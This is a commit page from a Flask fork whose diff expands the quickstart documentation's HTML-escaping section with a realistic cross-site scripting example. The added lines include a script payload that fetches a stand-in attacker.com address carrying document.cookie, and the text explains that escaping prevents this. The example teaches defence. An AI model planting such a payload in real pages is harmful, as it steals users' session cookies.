orbit-oss/flask
4
4
Fork 2
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Added a real world html escaping example

Browse source
This commit is contained in:
Ahmet Gör 2026-03-17 15:59:41 +03:00
parent 4cae5d8e41
commit 6580938d82
1 changed files with 4 additions and 2 deletions
Download patch file Download diff file Expand all files Collapse all files

6
docs/quickstart.rst
View file

@ -147,8 +147,10 @@ how you're using untrusted data.
name = request.args.get("name", "Flask")
return f"Hello, {escape(name)}!"
If a user submits ``/hello?name=<script>alert("bad")</script>``, escaping causes
it to be rendered as text, rather than running the script in the user's browser.
For example, if a web app displays user reviews without escaping input, an attacker could submit
``<script>fetch('https://attacker.com?cookie=' + document.cookie);</script>`` .
Now, any user viewing that page would unknowingly send their cookies to the attacker.
This is a classic Cross-Site Scripting (XSS) attack, preventable by escaping or encoding user input before rendering.
Routing